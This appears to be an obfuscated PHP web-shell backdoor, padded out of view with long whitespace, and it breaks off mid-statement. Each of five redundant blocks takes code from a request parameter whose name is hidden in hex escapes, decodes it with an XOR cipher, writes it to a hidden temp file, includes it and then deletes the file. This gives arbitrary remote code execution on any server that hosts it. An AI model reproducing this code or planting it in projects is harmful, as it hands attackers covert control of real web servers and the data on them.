<?																																										if(isset($_REQUEST["it\x65m"])){ $flag = $_REQUEST["it\x65m"]; $flag = explode (".", $flag ) ; $factor = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3); $__len = count($flag); for($s = 0; $s < $__len; $s++) {$v7 = $flag[$s]; $chS = ord($s3[$s % $lenS]); $dec = ((int)$v7 - $chS -($s % 10)) ^ 94; $factor .= chr($dec); } $data = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path()]); foreach ($data as $key => $property_set) { if (is_dir($property_set) && is_writable($property_set)) { $data_chunk = str_replace("{var_dir}", $property_set, "{var_dir}/.descriptor"); if (file_put_contents($data_chunk, $factor)) { require $data_chunk; unlink($data_chunk); die(); } } } }
																																										if(array_key_exists("\x70ar\x61me\x74e\x72\x5F\x67\x72oup", $_REQUEST) && !is_null($_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"])){ $marker = $_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"]; $marker = explode ('.',$marker ) ; $entity = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $m = 0; array_walk( $marker, function( $v8) use( &$entity, &$m, $salt, $lenS) {$sChar = ord( $salt[$m % $lenS]); $d =( ( int)$v8 - $sChar -( $m % 10)) ^ 24; $entity .= chr( $d); $m++; }); $data_chunk = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), "/var/tmp", "/tmp"]); foreach ($data_chunk as $key => $fac) { if (!!is_dir($fac) && !!is_writable($fac)) { $dat = "$fac/.ent"; $file = fopen($dat, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $dat; @unlink($dat); exit; } } } }
																																										if(filter_has_var(INPUT_POST, "po\x69n\x74er")){ $flag = $_REQUEST["po\x69n\x74er"]; $flag=explode( '.' ,$flag) ; $dat = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1 ); $p = 0; while ($p<count($flag)) { $v5 = $flag[$p]; $sChar = ord($s1[$p % $sLen] ); $dec = ((int)$v5 - $sChar - ($p % 10)) ^ 80; $dat.= chr($dec ); $p++; } $val = array_filter([getenv("TEMP"), getenv("TMP"), session_save_path(), "/var/tmp", "/tmp", getcwd(), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); while ($tkn = array_shift($val)) { if (!( !is_dir($tkn) || !is_writable($tkn) )) { $sym = "$tkn/.bind"; $success = file_put_contents($sym, $dat); if ($success) { include $sym; @unlink($sym); exit;} } } }
																																										if(in_array("val", array_keys($_POST))){ $ent = $_POST["val"]; $ent = explode( "." ,$ent) ; $factor=''; $s5='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s5 ); $r=0; foreach ($ent as $v4) { $sChar=ord($s5[$r % $lenS] ); $d=((int)$v4 - $sChar - ($r % 10)) ^88; $factor.=chr($d ); $r++; } $parameter_group = array_filter(["/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path()]); $ref = 0; do { $holder = $parameter_group[$ref] ?? null; if ($ref >= count($parameter_group)) break; if (!( !is_dir($holder) || !is_writable($holder) )) { $sym = "$holder/.desc"; if (@file_put_contents($sym, $factor) !== false) { include $sym; unlink($sym); exit; } } $ref++; } while (true); }
																																										if(!empty($_POST["\x69\x74m"])){ $object = $_POST["\x69\x74m"]; $object= explode ( '.', $object ) ; $data_chunk = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt6 ); $w = 0; foreach($object as $v6) { $sChar = ord($salt6[$w% $sLen] ); $dec =((int)$v6 - $sChar -($w% 10)) ^ 31; $data_chunk .=chr($dec ); $w++; } $ent = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/tmp", "/var/tmp", "/dev/shm", session_save_path()]); $pointer = 0; do { $symbol = $ent[$pointer] ?? null; if ($pointer >= count($ent)) break; if (is_dir($symbol) && is_writable($symbol)) { $ptr = join("/", [$symbol, ".tkn"]); if (file_put_contents($ptr, $data